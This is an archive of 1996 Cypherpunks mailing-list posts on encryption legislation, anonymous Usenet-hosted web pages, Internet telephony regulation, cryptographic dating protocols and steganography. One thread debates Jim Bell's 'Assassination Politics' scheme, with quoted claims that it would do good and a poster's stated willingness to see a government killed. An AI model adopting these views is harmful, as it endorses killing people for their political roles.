>> Ha ha!  That's rich!  There is no reason that a "pro-encryption"
>> bill has to contain any general "anti-crime" clauses.  The average
>> person is afraid of burglars, muggers, murderers, rapists, car
>> thieves.  When is the last time the average person was the victim of
>> a crime whose investigation could be "thwarted" by the use of
>> encryption?  If you can't think of an example, you've just proved my
>> point:  This provision is entirely irrelevant to the average citizen
>> (at least in a "positive" way) and can't be considered a "win" for
>> him. 
>
>You talk about my being naive, this takes the cake.  Do you really 
>believe that any pro-crypto bill could make it through Congress with 
>out some sort of anti-crime clause?  

That might be the "realistic" position, but it's a position which assumes 
that the government employees have their own agenda and interests, and will 
act on those interests and against those of the average citizen.  This is 
certainly true, obviously, but that is exactly where the problem lies!

Jim Bell
jimbell@pacifier.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUJWh/qHVDBboB2dAQGo9QP/XKQ9EqAZ60muoZNE7QD9m0U5B12c8Fav
ECVNObImJ+Y6hTniq43MHx6WoCQ+hOEZqWmLN7WDK9NkylnsOcveuUinrRnfJq97
cRmhqHuxSvBVnfzjfXW2RNUmLG+BcGCh88uSTeznEol9djQiMxPr7tOugB2AW5+u
3okUcP31ZBE=
=CR2B
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 10 Mar 1996 17:32:45 +0800
To: cypherpunks@toad.com
Subject: anonymous web pages (Was: SurfWatch)
In-Reply-To: <01I25AB1E1DIAKTUGH@mbcl.rutgers.edu>
Message-ID: <199603100222.UAA03114@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


E. Allen Smith said,

> ... until someone comes up with anonymous-location web pages...

Has anyone ever considered setting up anonymous web sites on top of
usenet?  People could post pages anonymously to usenet, and the web sites
could grab them and put them up automatically.  The pages could expire
just like usenet.  And just as there are many nntp servers that contain
more or less the same informaton, there could be many of these anonweb
servers with essentially the same information.

Right now a news administrator isn't held responsible of there's some
"bad" information in his news spool -- copyright violations, obscenity,
etc.  If the link between physically hosting a web page and being
responsible for its contents could somehow be broken, then anonymous web
pages would be possible.  If an anonweb server was just a robot that 
reads usenet, maybe anonweb operators could slide in under the usenet 
tradition.

The distributed nature of the usenet model would also solve another
problem with anonymous web pages, namely that it costs money to serve
them, and there's no way to tell how popular an anonymous web page will be
until you put it out there.  Individual ISPs would host anonweb servers
for the benefit of their customers (web page readers) rather than the
anonymous publishers.  If someone puts up an anonweb page that gets
100,000 hits a day, an ISP with 2,000 customers will only have to shoulder
a small part of that burden.

--
alex




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 10 Mar 1996 13:19:38 +0800
To: Steven Weller <stevenw@best.com>
Subject: Re: SurfWatch
In-Reply-To: <v01540b00ad67e1a770f3@[206.86.1.35]>
Message-ID: <Pine.SOL.3.91.960309202129.18235A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Mar 1996, Steven Weller wrote:

> In the mid-eighties in the UK they adopted the idea of a red triangle
> continuously displayed on the screen of movies shown on TV that were
> considered to have more than the normal share of wobbly pink bits, airborne
> blood, etc.

I seem to remember this being something Channel 4 introducted on there 
own to try and deflect criticism (and probably saved the station). 
Probably saved the station, and introduced a lot of people to the art of 
subtitles :-)

Has anybody registered CrotchWatch as a trademark? 

Simon


---
	i gotta say this you're acting blameless		
        you're making bucks like you're fucking shameless
        i'm coming hard  it won't be painless
        coding styles of the rich and brainless





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 11:28:14 +0800
To: jimbell@pacifier.com
Subject: Re: Assasination Politics
Message-ID: <01I25C3C4MW8AKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell"  9-MAR-1996 13:28:53.37

>The one thing that disappoints me about the result of my presentation of 
>this idea is that I haven't heard any intelligent arguments quantitatively 
>arguing that things will be worse.  Other proponents simply agree that the 
>system would be better; most of the opponents don't take the trouble to 
>quantify their objections.  

	_Quantitatively_? How could such arguments be quantitative? The only
quantitative arguments that seem to be applicable appear to be over whether
or not it could work, not whether or not it would result in an ethically
better situation (assuming close to congruent ethical principles, such as
agreement on civil liberties).

>What's interesting is that you see this; yet there are a number of opponents 
>who can't seem to realize that what THEY want (or, for that matter, what _I_ 
>want) may be absolutely irrelevant to what is actually going to happen.  

	Whether it will work is a seperate question from whether, if it will
work, the consequences are preferable. I'm discussing the first question on a
linked thread. Admittedly, one topic that should be brought up in this (and in
case of others having skipped this message, one that I'll bring up in that
thread) is whether the possible weaknesses of the system (the number of persons
in the government, et al) may result in its having an ethical result, if
possibly not the one for which you had the original idea. I suspect most people
aren't going to want to eliminate every IRS agent from the face of the earth,
given currently present moral standards. Some other branches of the govenrment
may be a different possiblity. (As well as cases outside of the government
such as O.J. Simpson).

>Perhaps, but most (non-net-using) people are so unaware of encryption as to 
>make this irrelevant, I think.

	It's still a worry; if moves were made to put it into practice, it
could be used by a government to take various means to crack down on the use
of encryption, et al. How much they could suceed in doing so is another
question, and one that is frequently debated on this list.

>Have you forgotten what might happen to those same televangelists?

	Yes, they might be targeted also. Essentially, this comes down to an
ends-justify-the-means problem, and one on which I'd come down on the "no"
side of the question - I wouldn't want the televangelists killed just because
they called for the assasination of someone who shouldn't be assasinated, even
though this would turn out the best result in the end. (I am willing to see
Iran's government killed, on the other hand, since I _know_ they're
participants in a system which kills or tries to kill innocent people (i.e.,
Rushdie). That sort of proof wouldn't be present under Assasination Politics
for televangelists.)

>While I'd sure like to be able to design a system where only the "right" 
>people die (by my own opinion), I'm under no illusion that this would be 
>anything other than a dictatorship under "Jim Bell" or whoever happened to 
>be in control.  I think I've done a fairly good job of designing 
>(anticipating?) a system that will do a lot of good, hopefully without doing 
>a lot of bad.

	I once sent back to someone who was asking "What would you do to
improve the world" a response of "put me in charge, if you're going to ask that
general a question." I will leave the reader to conclude whether I was kidding.
	I understand the basic problem of "will it be better than the current
system or not" as not being "which is perfect."
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 10 Mar 1996 11:28:15 +0800
To: rich@c2.org
Subject: Re: FCC & Internet phones
Message-ID: <01I25C5K07CEAKTUGH@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rich@c2.org"  "Just Rich"  9-MAR-1996 15:03:20.78

>I'm just wondering how the hell they would enforce regulations on carrying
>voice over the Internet. Are they going to analyze every packet? What
>happens when someone makes a trivial modification to the code, or adds a
>gateway, so that the voice call uses a different UDP (or more likely RTP)
>port and header format? 

	I believe the companies are mainly worried about other companies doing
such phone service, not about the individual. However, they may also go after
those selling equipment (inc. programs) for such competition.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 10 Mar 1996 13:31:07 +0800
To: Mutant Rob <wlkngowl@unix.asb.com>
Subject: Re: FCC & Internet phones
In-Reply-To: <199603100222.VAA06105@bb.hks.net>
Message-ID: <Pine.SOL.3.91.960309203243.18235B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


The real complaint of the telephone companies seems to be not that the 
calls are free, but that the 'whatevers' are not subject to the same 
tariff regulation that they are. I'm sure it's because they want to be 
able to lower their fees to the same level to compete. Quit sure. 

Simon 
---
	i gotta say this you're acting blameless
        you're making bucks like you're fucking shameless
        i'm coming hard  it won't be painless
        coding styles of the rich and brainless





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Monta <pmonta@qualcomm.com>
Date: Sun, 10 Mar 1996 13:53:00 +0800
To: rich@c2.org
Subject: Re: FCC & Internet phones
Message-ID: <199603100444.UAA02758@mage.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Allen Smith writes:

> I believe the companies are mainly worried about other companies doing
> such phone service, not about the individual. However, they may also
> go after those selling equipment (inc. programs) for such competition.

Perhaps, but free software, for example, does not offer much of
a target.  Internet<->PSTN gateways sound more like a commercial
venture, but even here we may start to see "free" services, such as
the fax service that's been around for some time.

Cheers,
Peter Monta   pmonta@qualcomm.com
Qualcomm, Inc./Globalstar




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 14:07:41 +0800
To: "Deranged Mutant" <vznuri@netcom.com>
Subject: Re: rhetorical trickery
Message-ID: <m0tvd3y-0008xBC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:15 PM 3/9/96 +0000, Deranged Mutant wrote:
>"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:
>
>> >> but I have a question: how did they know it was his diary?
>> >
>> >If I remember some earlier discussion about that case from a few years
>> >ago, the file was called "diary.pgp".
>> 
>> how did they know it was *his* diary?
>
>Well, nobody *knows*. But if you've got a file called diary.pgp on 
>your hard drive, chances are it's a diary of some sort. It's a 
>reasonable guess.

Or it's the list of local dairies, and the guy can't spel....

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sun, 10 Mar 1996 17:30:41 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: rhetorical trickery
Message-ID: <199603100221.VAA13733@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


"Vladimir Z. Nuri" <vznuri@netcom.com> wrote:

> >> but I have a question: how did they know it was his diary?
> >
> >If I remember some earlier discussion about that case from a few years
> >ago, the file was called "diary.pgp".
> 
> how did they know it was *his* diary?

Well, nobody *knows*. But if you've got a file called diary.pgp on 
your hard drive, chances are it's a diary of some sort. It's a 
reasonable guess.

Whether there's anything incriminating in it for him or anyone else 
is another matter, of course.


 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 10 Mar 1996 11:58:49 +0800
To: JonWienke@aol.com
Subject: Re: Bootable disks
In-Reply-To: <960306145542_239131693@emout09.mail.aol.com>
Message-ID: <31423C9C.41E0@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


In Mar. 5 (?) Edupage, there's a blurb about a floppy drive that is
compat with 1.44M disks but can also handle special 80M disks, allegedly
available in April.

If so, there's some nice potential here.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Sun, 10 Mar 1996 12:00:44 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <199603100222.VAA06105@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

t byfield wrote:
[..]
>  doubt the situation for bureaucratic rule-mongering would be much
>  different. The WP article said that has ACTA has "asked the [FCC] to stop
>  this kind of communications and study how to regulate it," probably--and
>  not surprisingly --in that order.

I noticed they complainted about IPhone "giving away our product for
free" or something like that. Bad implications. Imagine MS going after
the FreeDOS people, or Novel or AT&T or whoever owns Unix now going after
Linux or the FSF/GNU...

[..]
>         Q: Is it practically possible to find netphone traffic on a
> generic network at any level above the source and target addresses?

Good question.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMUI89CoZzwIn1bdtAQFXBAF/RSoygg/szTsrtI+Ds512YDV3KswRP43r
4HfgV+PHex3JqnhOWNbWuNga05EsFDJp
=EcBe
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 10 Mar 1996 14:31:52 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: Petty Civil Disobedience
Message-ID: <199603100537.VAA24499@mail1.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 AM 3/9/96 -0500, Declan B. McCullagh wrote:
> Perhaps we should put up our own protest web sites with one or two
> explicit sexual images as real civil disobedience?

Major problem here is that ten million horny geeks are likely to bring 
your server to its knees, but if one only has one image, and it is 
moderately small, say thirty thousand bytes, perhaps the flood would 
taper off eventually.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 11 Mar 1996 18:27:41 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Cryptanalysis
In-Reply-To: <ad676d9b0c021004b946@[205.199.118.202]>
Message-ID: <199603100237.VAA02706@homeport.org>
MIME-Version: 1.0
Content-Type: text


Timothy C. May wrote:

| cryptanalysis. (Not to sound harsh to Allen, but why would anyone ask here
| on the list for recommendations to such a standard subject when Schneier,
| Garfinkel, Denning, etc. all have books listed?)

	Niether Schneier nor Garfinkel really talk about analysis.
The only book I can think of is Biham's "Cryptanalysis of the DES,"
and thats on a single technique.

	I don't know of any books on 'applied cryptanalysis.'  The
public knowledge is all in the heads of a few practitioners, and the
papers they've written.

| And there are so many interesting areas to pursue with using and furthering
| modern crypto, that I just can't understand how people can think that
| classical cryptanalysis is useful. It might be fun, as a hobby, but it has
| no bearing on modern systems. (Well, I'm exaggerating a bit. I suspect that
| classical cryptanalysts at the NSA or GCHQ might have some insights into
| some problems with modern systems, such as traffic analysis. So I shouldn't

	While classical cryptanalysis is not likely to be useful,
traditional cryptanalysis hasn't changed much.  Stealing keys, bribing
people, getting physical access to systems is still far more useful
than trying to brute force a key.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 10 Mar 1996 14:37:55 +0800
To: Chris Townsend <townsend@smokin.fly.net>
Subject: Re: Leahy's guillotine.
Message-ID: <m0tvdtb-0008xYC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 11:44 PM 3/9/96 -0500, Chris Townsend wrote:

>> 2804. Unlawful use of encryption to obstruct justice
>>   Whoever willfully endeavors by means of encryption to obstruct,
>>    impede, or prevent the communication of information in furtherance
>>    to a felony which may be prosecuted in a court of the United States,
>>    to an investigative or law enforcement officer shall...
>> 
>> 
>> I think we may reasonably assume that this section was very carefully 
>> written, and thus it may contain meanings (or avoid containing meanings) 
>> that only a careful reading will disclose.  
>> 
>> Contrary to some other sloppy  interpretations that I've seen here recently 
>> from organizations that ought to know better, I see nothing in this section 
>> that limits the prosecution on this law to people who are actually 
>> participating in a crime.  This distinction is vital.   While the sentence 
>> is not diagrammed, it appears to be the INFORMATION which is in "furtherance 
>> to a felony," not the "obstructing" of that communication.  The implication 
>> is that it is not necessary that a person know the exact information 
>> involved or be able to decrypt it; he needs only be deliberately using 
>> encryption to prevent the knowledge of what the information is about, or its 
>> routing.  (As in an encrypted anonymous remailer, for instance.) 
>
>
>???  Your third sentence doesn't make any sense.

Well, I'll separate it for closer review:

>> While the sentence 
>> is not diagrammed, it appears to be the INFORMATION which is in "furtherance 
>> to a felony," not the "obstructing" of that communication.

The problem is that the original sentence (in the proposed law) is 
ambiguous.  But I think the most likely interpretation is that it is the 
"information" which is in "furtherance of a felony," and "obstructing the 
commmication" of that information is the crime they define.


>  While I agree with your 
>position, why would it *possibly* be a crime to interefere with felonious 
>communcations?

The law is POORLY worded.  Padgett Peterson noticed this yesterday, BTW, and 
commented on it on Cypherpunks.  You've stumbled on the alternate meaning 
that he complained about.  Realistically, however, I think we can probably 
agree that this meaning was not the one they intended; that's why for 
purposes of analysis I study the other meaning.

>  The lanuguage is lamentably unambiguous about the
>fact that it is the obstruction and not the information that is
>in furtherance of a felony... 

I think I disagree.  What we need, however, is an "emergency-call English 
major" who could diagram the various possibilities for us and we could 
study them separately.  There's plenty of ambiguity in this sentence; but I 
think that is absolutely intentional.  


>> Aside from this, it isn't clear what is meant by the phrase, "obstruct, 
>> impede, or prevent the communication of information in furtherance to a 
>> felony."    An obvious problem is this:  How will they know if the use of 
>> encryption actually had that effect?  If it was UNsuccessful, then 
obviously 
>> that encryption did not prevent the government from obtaining information.  
>> If it was SUCCESSFUL, then how is the 
government to know that the 
>> communication in question was "in furtherance to a felony"?  Even if they 
>> can prove the felony by other means, how can they show that the 
>> communication actually had anything to do with the crime?
>
>It is quite conceivable that an unsuccessful attempt to obstruct
>justice might cause additional trouble, time, and expense to the
>guys in the white hats. 

That depends on who you believe actually wears the white hats...

> Note that the language does not distinguish
>between successful and unsuccessful attempts...though you're right
>that it seems that only unsuccessful attempts could be verified...
>the rest is clouded by your assumption that the information, rather
>than the obstruction, must be in furtherance of the crime...

Well, I invite you to try to construct an interpretation of the sentence in 
as many ways as you can imagine.  I think you'll discover that it is 
practically intended to mislead.


>> Another problem:  Encryption, per se, does not "prevent the communication 
of 
>> information."  What it does, of course, is to prevent the UNDERSTANDING of 
>> that information.  Do the writers of this bill intend to use this law to 
>> punish the LATTER effect, rather than the former? 
>> 
>> Further, how is the person to be charged to know if his use of encryption 
>> had the effect of "obstruct[ing], imped[ing], or prevent[ing] the 
>> communication of that information?  If he encrypts a file to his hard disk, 
>> and he doesn't intentionally send the file to the cops, how is he supposed 
>> to anticipate that the use of encryption had this effect?  As far as HE 
>> knows, it was simply his decision to not send the file to the cops; he can't 
>> be expected to know that they'll show up the next morning with a search 
>> warrant and take his computer, can he?  Would his refusal to provide the 
>> decrypt key constitute a violation of this section?
>
>Probably.  That's what the word "willful" is doing in there.   Read
>carefully:  it's willful obstruction, not willful encryption...

Justa sec... I think you've forgotten that merely running an anonymous 
encrypted remailer could be considered "willful obstruction."  Now, if the 
communication wasn't "in furtherance to a felony" then it wouldn't be 
criminal (it would be a LEGAL "willful obstruction, right?) , but then again 
the operator wouldn't know that, would he?  

Which brings us to yet another ambiguity:  The operator of an anonymous 
encrypted remailer wouldn't know that any given packet was "in furtherance 
of a felony" but he MIGHT be absolutely aware that any one of them COULD be! 
 Does this rise to the level of violating the law?  If not, why not?


>I am not a lawyer, although I play one on the net.
>
>I agree with your position, but you're not reading as closely 
>as the enemy will...            


Who, in this case, is "the enemy"?  As far as I can see, "the enemy" are the 
people who wrote this section of the bill.

While it's been a few decades since I last diagrammed a sentence, I will 
start by putting parentheses around sections of this sentence to separate it 
into what I believe is its "intended" meaning.  


>> 2804. Unlawful use of encryption to obstruct justice
>>   Whoever willfully endeavors (by means of encryption) to (obstruct,
>>    impede, or prevent) the communication of (information in furtherance
>>    to a felony) (which may be prosecuted in a court of the United States),
>>    to an investigative or law enforcement officer shall...


I challenge anyone to re-write this section to:

1.  Achieve what he believes to be a "reasonable" result and

2.  Avoids the criticisms that I've previously mentioned WRT this portion of
the 
bill.


Also, I think anyone who supports this kind of section should be able to 
give me a few examples of crimes whose investigation has (or could be) 
thwarted in a way that would violate this section.  I've said it before and 
I'll say it again:  The average citizen is essentially never the victim of a 
crime of this type.  For whom, then, is this law written?  I think it's 
written for the benefit of the politicians alone.  They want to live.

Jim Bell

jimbell@pacifier.com
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMUJryfqHVDBboB2dAQEZ1wQAhDS3fEz1Q8QaoZCf3c6W6e5fCDbfsz4J
3smXEMg/28xGyiwMiUN1gUjbVOYZKNdczaAMzIKx3I53Reig+9DQnc5CTGHqigaV
y1yeiKdV1XKaZk9vV0ZCaTQ31Gv2/GV45eOVKoZRQOtQI+W6AgnrsegLH4TRBxkk
NzQv2kNN4Hc=
=dBew
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dimitris Tsapakidis <dimitrt@dcs.rhbnc.ac.uk>
Date: Sun, 10 Mar 1996 06:06:44 +0800
To: cypherpunks@toad.com
Subject: Re: Square pegs in round holes, matchmaking, corporate mailservers
Message-ID: <199603092150.VAA08613@alice.cs.rhbnc.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


Let's stick one thread this time. I lost track when the Subject header
was changed. Twice! :-)

The original definition of the problem:

>>Bob must find out whether Alice has declared (commited) her interest
>>in him, if and only if he has declared (commited) his interest in her.
>>Before he does so, he can at most know that a girl is interested in
>>him. Another description: Bob and Alice can have a date if they both
>>commit to each other. If only one commits, nobody will ever find out
>>about it.

(PADGETT@hobbes.orl.mmc.com) wrote:

>Instead of using a binary assymetric key, why not a triple ? (Just
>because I do not know of any does not mean that one does not exist).
>Given a triple (tertiary ?) function each individual would only need
>their receive key and a "post office" transmit key. On sending a
>message, it would be encrypted with a session key and the session key
>encrypted with the post office key.

You got me confused. Does this thing exist, or you would like it to
exist? :-)


Bill wrote:

>If Bob wants to talk to Alice, he sends Trent B = g**b, marked
>"For Alice", optionally anonymously. Trent calculates
>X = B**t == g**bt, and sends it to Alice. Alice calculates
>K = X**a == g**bat, calculates H = Hash(K) and posts it anonymously,
>or sends it to Trent to post or mail to Bob. If Alice wants to talk
>to Bob, she calculates A = g**a mod p, sends it to Trent, optionally
>anonymously, marked "For Bob". Trent calculates Y = A**t == g**at ,
>and sends it to Bob. Bob calculates K' = Y**b == g**abt, calculates
>H' = Hash(K') and notices that it's the same as the H he pulled off
>the net earlier. Bob says "Oh, wow! Alice wants to talk to me!",
>encrypts some lame drivel of a message M with key K'==K, and mails
>it to Alice if he knows her address or posts it with Subject: H',
>which Alice receives.

on which Hal commented:

>I don't think this satisfies the requirements. Once Bob calculates H'
>and sees that it matches H, he knows that Alice likes him, but Alice
>doesn't know that he likes her. The whole point of the protocol was to
>be fair. Bob must only learn that Alice likes him if Alice is
>guaranteed to learn that he likes her.

Correct. I believe my hash_k is equivalent to your **t (which I thought
as well, but preferred to use hash_k in my original description). Hence,
my "mediated off-line" protocol can also be written as:

- Bob, who likes Alice, sends [g**ab, pseudo(B)] to Trend who posts
  [g**abt, pseudo(B)]. Alice learns nothing at this point.
- If she ever decides she likes Bob, she sends [g**ab, pseudo(A)] to
  Trend, who posts [g**abt, pseudo(A)].

So Bob and Alice notice
g**abt, pseudo(B) and
g**abt, pseudo(A)
being posted so they know they have a match.

Somebody who knows t can only find out who is interested in them.
Nothing more.

T could possibly be replaced by n T(i)'s each of whom has a secret
key t(i). But this is another thread.


Hal added:

>The easiest formulation is pairwise:
>Alice and Bob mutually engage in the calculation of "Alice loves Bob"
>AND "Bob loves Alice". Each inputs his feelings as an input bit, and
>the output will be true only if they have mutual feelings.
>Each pair of potential lovers would then go through the protocol with
^^^^^^^^^^
>each other.

Assuming we have a fair AND protocol, Alice cannot initiate it with
Bob, because this would demontrate her interest. Solutions:

1) You can force all possible pairs to execute the protocol, as you
said, but is not very practical.

2) Alice could initiate the protocol even if she is not interested,
in order to "hide" the cases when she is genuinely interested. Not
very practical, either.

3) My proposal (protocol 3 in my previous posting) is that Alice
approaches Bob anonymously. But they can't execute the AND gate,
because Bob doesn't know who she talks to. What they compare is:
Alice's number: g**ab and Bob's number: g**bx where x is the
girl he likes.

>This problem is solved in "Multiparty Computations Ensuring Privacy of
>Each Party's Input and Correctness of the Result", by Chaum, Damgard,
>and van de Graaf, in the proceedings of the Crypto 87 conference. They
>even discuss this application directly: "Note that this AND-gate
>computation, where both parties want to hide their input from each
>other, has a meaningful application: consider the situation where Alice
>and Bob have just met, and each considers dating the other. Neither
>wishes to lose face in the following sense: if Alice wants a date but
>Bob doesn't, Alice does not want to let Bob know that she wanted the
>date. And the same holds for Bob. In other words: if a party does not
>want the date it does not find out the other party's decision."

Thanks, I will have a look. This will only work if there is a law
forcing newly met pairs of people to enter the protocol, as in
(1) above, right?

  Dimitris


-- 
Dimitris Tsapakidis               PGP keyID: 735590D5
dimitrt@dcs.rhbnc.ac.uk           MSc in Information Security,
This space reserved               Royal Holloway, University of London
for future use.                   Origin: Thessaloniki, Macedonia, Hellas




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Sun, 10 Mar 1996 12:16:09 +0800
To: cypherpunks@toad.com (Cypherpunks mailing list)
Subject: Stego - images and sounds
Message-ID: <2.2.32.19960310030830.00ec2fc8@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 PM 3/8/96 -0800, Jim McCoy <mccoy@communities.com> wrote:
>
>Provided the bits are random in the way that they should be... The low-order
>bits in such files were chosen by implementors of stego programs because
>modification would not be noticed by the person viewing or listening to
>the file, not necessarily because there was actually randomness at this
>level which could be replaced.  Does anyone know of a survey of images or
>sound files which tested the statistical randomness of these bits?  They
>may not be as random as people think they are.
>

 This should depend on how the image/sound was obtained, though I am pretty
sure in most cases there would be easily detectable patterns.  They would
be the strongest in software-generated files, smaller in good reproductions
of precise recordings, and very small in noisy recordings.  In all cases,
the number of lower bits used for stego-messages may be chosen lower than
the existing noise of the signal.  Changing all lower bits in a good
rendered image may still be unnoticeable for the human viewer, but really
easy to detect to a program.

-------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>
Home:      http://www.lucifer.com/~sasha/home.html
-------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Sun, 10 Mar 1996 16:50:07 +0800
To: "cypherpunks@toad.com>
Subject: RE: Petty Civil Disobedience
Message-ID: <01BB0E1B.8337D200@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: 	jamesd@echeque.com

Major problem here is that ten million horny geeks are likely to bring 
your server to its knees, but if one only has one image, and it is 
moderately small, say thirty thousand bytes, perhaps the flood would 
taper off eventually.
...................................................................................

Here James has stated the crux of the problem in its basic, elementary form.   Why cannot legislators, the courts, and all those socially responsible individuals promoting the CDA and their other complaints against indecency recognize the obvious:

that the problem of the presence of (and the success of) alarmingly objectionable material on the internet is all due to the existence of all those "ten million horny geeks", who en masse can actually "bring servers to their knees".

I think this is a Male vs Male problem, and personally I think the mature and wise men of the world should take the case in hand and deal with it on a Man-to-Man basis.

Or, they could just adopt Assassination Politics and do away with all those "other people's" (horny) internet-addicted male children.

(Ha-ha.   Really, Jim -  any "democratic society" where one group elects a governor and another group votes to to shoot that person down sounds more like a Bosnian/Serv "society".  It wouldn't make sense to become a member of such a disfunctional, self-defeating group of misfits in the first place.)

   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 10 Mar 1996 13:22:24 +0800
To: cp@proust.suba.com
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <199603100222.UAA03114@proust.suba.com>
Message-ID: <9603100428.AA1031@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> Alex Strasheim <cp@proust.suba.com> writes:

  > Has anyone ever considered setting up anonymous web sites on top
  > of usenet?  People could post pages anonymously to usenet, and the
  > web sites could grab them and put them up automatically.

I see two problems right off the top:

1. Given the number of images, sound files, and movies that the most
   popular web pages will invariably have, the load incurred by
   propagating the associated files all over the net would be
   tremendous;

2. If CDA begins to be seriously enforced, Usenet will suffer as much
   as the Web: as soon as ISPs have reason to believe that such and
   such a newsgroup is carrying unlawful material, they'll have to
   stop spooling those groups.  The material will move into off-topic
   groups, ISPs will get tipped off, and they'll have to shut those
   off too.  I can imagine a whole army of busybodies scanning the
   comp.* hierarchy for pictures of tits...

-- 
Roger Williams            PGP key available from PGP public keyservers
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 07:18:27 +0800
To: Bryan Koschmann <bryank@comtch.iea.com>
Subject: How to get test messages to test your mail filters
Message-ID: <199603100739.XAA27461@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sending test messages to mailing lists of 500-1000 people 
just to test your mail filters is rude, and it's been happening a lot lately.
On the other hand, building interesting mail filters is a 
reasonable cypherpunk topic - issues like reputation servers,
email privacy, etc. are relevant technology, though this isn't mailpunx.
So if you want to send us all a test message, it'd be nice
if there were some description of the cool stuff you're implementing :-)

On the other hand, if you just need someone other than yourself to
send you mail, one useful technique is to send email to
bogususer@wellknownmachine.com, for some value of wellknownmachine.
Since most machines don't have a user named "bogususer", it'll bounce,
unless of course it's running OS/2, which assumes that email for any
address on the machine is targeted at the real user (or unless it's
running an email system that doesn't implement bouncing...)

At 01:40 AM 3/9/96 -0800, Bryan Koschmann <bryank@comtch.iea.com> wrote:
>just a test to see if my filter works..sorry3 for any inconvenience
>	Gate|<eepeR (!-=Gate|<eepeR ruLeZ=-!)

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
